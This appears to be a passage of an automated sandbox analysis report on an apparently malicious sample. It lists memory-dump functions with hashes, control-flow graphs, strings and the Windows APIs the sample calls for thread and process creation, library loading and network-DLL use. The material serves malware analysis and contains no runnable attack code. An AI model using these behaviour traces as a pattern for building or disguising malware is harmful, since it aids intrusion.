                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                                • Instruction ID: e7d3dcbb9dff8109d5b77cb91799384e26efbbd368afc7e05df0448f0ea7e9eb
                                                                • Opcode Fuzzy Hash: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                                • Instruction Fuzzy Hash: 18900225225504021145F558061890B048997D6351395C015F1416590CC76289655321
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                                • Instruction ID: cac63d534eb0c682d7eb4e7c36e6e7945f2a5836108b3edad2808207d4f19c9a
                                                                • Opcode Fuzzy Hash: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                                • Instruction Fuzzy Hash: E2900221605504425140B1688858D064049ABE1211755C121E0998550D869A89655765
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                                • Instruction ID: a7ffa00478660fcf416fe169745c48bb608cca0e8fcb500fe4bce194018ead2f
                                                                • Opcode Fuzzy Hash: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                                • Instruction Fuzzy Hash: 51900221215D0442E200B5684C28F07004987D0303F55C115E0154554CCA5689615621
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                                • Instruction ID: 4634d928edb80c507da2a510888a7ad114c6b70419b4c4f8648e91ffa4c604de
                                                                • Opcode Fuzzy Hash: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                                • Instruction Fuzzy Hash: 2890026134550842E100B1584428F060049C7E1301F55C015E1064554D875ACD526226
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                                • Instruction ID: d61c35260e4ae7ee59d24c7678558a597342336f498a9b763353f53ba785a562
                                                                • Opcode Fuzzy Hash: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                                • Instruction Fuzzy Hash: 0590022160550902E101B1584418A16004E87D0241F95C022E1024555ECB668A92A231
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                                • Instruction ID: cdc359fb419f31ede06ec35bf55b977a984cd7dccc9e5fe65c82af83c17d1306
                                                                • Opcode Fuzzy Hash: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                                • Instruction Fuzzy Hash: BF90026120590803E140B5584818A07004987D0302F55C011E2064555E8B6A8D516235
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                                • Instruction ID: 0049fd52dbc39495122bdf08b76650b3d3ffb2bb183a6f942458c708b0caaf84
                                                                • Opcode Fuzzy Hash: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                                • Instruction Fuzzy Hash: 3F900221246545526545F1584418907404A97E0241795C012E1414950C86679956D721
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                                • Instruction ID: d6a55aa4b4b60a4bc1483da3ac20d7fd618ceb2b2da3ba1e13018dcd360c9c6c
                                                                • Opcode Fuzzy Hash: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                                • Instruction Fuzzy Hash: 5890023120550813E111B1584518B07004D87D0241F95C412E0424558D97978A52A221
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                                • Instruction ID: af1a02e22924812977476bb0c2aae43e28e92c2176a4e06d2af289e133af31e8
                                                                • Opcode Fuzzy Hash: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                                • Instruction Fuzzy Hash: 7B90022921750402E180B158541CA0A004987D1202F95D415E0015558CCA5689695321
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                                • Instruction ID: e3aff0bee90bf05031d8ad9230dc96257f8e499e2323c346cf2ed464f9a4023d
                                                                • Opcode Fuzzy Hash: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                                • Instruction Fuzzy Hash: 3690022130550403E140B158542CA064049D7E1301F55D011E0414554CDA5689565322
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                                • Instruction ID: 27e948ba4c3b553fc8cb9ee2978f4e6b61da8d50f99a38ba449d59527a6f87e1
                                                                • Opcode Fuzzy Hash: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                                • Instruction Fuzzy Hash: 6A90023120550802E100B598541CA46004987E0301F55D011E5024555EC7A689916231
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                                • Instruction ID: 98172ed4f2815d0427bf654bb5cfab9b62ea8356319cb310a722b5972f1a69c8
                                                                • Opcode Fuzzy Hash: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                                • Instruction Fuzzy Hash: 0590023120558C02E110B1588418B4A004987D0301F59C411E4424658D87D689917221
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                                • Instruction ID: f6290172e3e94e25e6b5e036ab7bbd1c516736702c71da16ba6ec2b21ab93038
                                                                • Opcode Fuzzy Hash: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                                • Instruction Fuzzy Hash: 8890023120550C42E100B1584418F46004987E0301F55C016E0124654D8756C9517621
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                                • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                                                                • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                                • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                                • Instruction ID: 589c0370722e23713c11ead713f0e3533cf07478b06ad497c0608540c44abedc
                                                                • Opcode Fuzzy Hash: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                                • Instruction Fuzzy Hash: E590022124955502E150B15C4418A164049A7E0201F55C021E0814594D869689556321

                                                                Control-flow Graph

                                                                control_flow_graph 420 3210c88-3210ca1 421 3210ca3-3210ca9 420->421 422 3210d0a-3210d22 call 322bec0 420->422 421->422 425 3210c7e-3210c80 421->425 427 3210d28-3210d5a call 3201410 call 3221b60 422->427 428 3210d23 call 3214460 422->428 425->420 433 3210d7a-3210d80 427->433 434 3210d5c-3210d6b PostThreadMessageW 427->434 428->427 434->433 435 3210d6d-3210d77 434->435 435->433
                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 03210D67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                • Instruction ID: 39d3c97754c9c3373ce256291db59829a210eecc74b311bf519f7ece3c3855e0
                                                                • Opcode Fuzzy Hash: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                • Instruction Fuzzy Hash: 0011597691024976DB11DBE18C40DEFBB7CEF91398F08C044F9042B101D6746DD687E1

                                                                Control-flow Graph

                                                                control_flow_graph 436 3210cf0-3210d02 437 3210d0a-3210d22 call 322bec0 436->437 438 3210d05 call 322b4b0 436->438 441 3210d28-3210d5a call 3201410 call 3221b60 437->441 442 3210d23 call 3214460 437->442 438->437 447 3210d7a-3210d80 441->447 448 3210d5c-3210d6b PostThreadMessageW 441->448 442->441 448->447 449 3210d6d-3210d77 448->449 449->447
                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 03210D67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                • Instruction ID: 5cc4dcdcae809c5523975d41e62bb7ee4a6bc3c5a3511a49043addbfeab9153f
                                                                • Opcode Fuzzy Hash: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                • Instruction Fuzzy Hash: C101D6B5D1021C7AEB10EBE58C81DEF7F7CEF41698F048064FA046B140D6786E4687B1

                                                                Control-flow Graph

                                                                control_flow_graph 450 3210cac-3210cb8 450->450 451 3210cba-3210cbd 450->451 452 3210d20-3210d5a call 3214460 call 3201410 call 3221b60 451->452 453 3210cbf-3210cc9 451->453 460 3210d7a-3210d80 452->460 461 3210d5c-3210d6b PostThreadMessageW 452->461 453->452 461->460 462 3210d6d-3210d77 461->462 462->460
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 0-3456940251
                                                                • Opcode ID: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                • Instruction ID: afa89c463d6db16603b463bda2395c3870dbf33eded443eea651f0ccbc293721
                                                                • Opcode Fuzzy Hash: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                • Instruction Fuzzy Hash: 22017BBA92124DBECB10DBB54C80DAF7BBCDEA2798B08C091F400EB141D5745DD687B6
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 03223AEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                • Instruction ID: e46c891566d03a4eced0a8ccb18d50cae316773aedd3b07b64c00518a07499c4
                                                                • Opcode Fuzzy Hash: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                • Instruction Fuzzy Hash: 08315CB5610705BBD714DFA4CC80FEBBBB8FB88704F544569E619AB280D7B46680CBA4
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                • Instruction ID: 7d895c4c8989e7064ff730eeb4bb98c084090459a5fa62dc3d67e93d5db50dcb
                                                                • Opcode Fuzzy Hash: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                • Instruction Fuzzy Hash: 963161B6A1020AAFCB00DFD8DD809EFB7B9FF88304B148559E515AB204D774EE45CBA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                • Instruction ID: b3e1f23d32dbabfc39f69919623eb601a9ad2a06580f5331da6db32ff13fd293
                                                                • Opcode Fuzzy Hash: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                • Instruction Fuzzy Hash: 5E3162B5A1020AAFCB00DFD8DC809EFB7B9BF88304B108559E515EB204D774EE45CBA0
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                • Instruction ID: ed34e44c11f71e12e7acea0c94998b41c6c58bf71a89fdc25f71d32d0eb623e3
                                                                • Opcode Fuzzy Hash: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                • Instruction Fuzzy Hash: 1F21007602DAD62BE722CA34CE802E2FFDDDB73210B6C025CD9D657281C752D45B82C1
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032182AC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                • Instruction ID: a743adb6e22090adb894dc2b8616694c0ca5af86d62663b828ff0c8370327932
                                                                • Opcode Fuzzy Hash: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                • Instruction Fuzzy Hash: 8A01CB3A52578426D730E27CDEC5BA5FBD49F21228F0C03E8E9088F2D2E1B4D1A28281
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032144D2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction ID: ac5c07aa4352a6e604fbfbf1463302aef8cb43ed3e2ccf860f385cbb1b89100e
                                                                • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction Fuzzy Hash: 46011EB9D1020EBBDF10EAE5DD41F9DB7B89B54208F0441A5EA08AB240FA71E7549B91
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,0321823E,00000010,?,?,?,00000044,?,00000010,0321823E,?,?,?), ref: 03229753
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction ID: 051cda1f6d071cf49b930c7ed59a2a305bbfbfbb65400ec179f0acda904c3023
                                                                • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction Fuzzy Hash: 3B01CCB6210208BFCB04DE89DC81EEB77ADAF8C714F408208BA09E7240D630F8518BA4
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209CE5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                • Instruction ID: 178b648155f779cfa317d06134e2b54d8b45fc2ad8051a229141c9368f934df6
                                                                • Opcode Fuzzy Hash: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                • Instruction Fuzzy Hash: 92F0653739031436E320B5AA9C12FD7B69CDB84B61F140426FB1CEF2C1D9D1B49142A4
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209CE5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
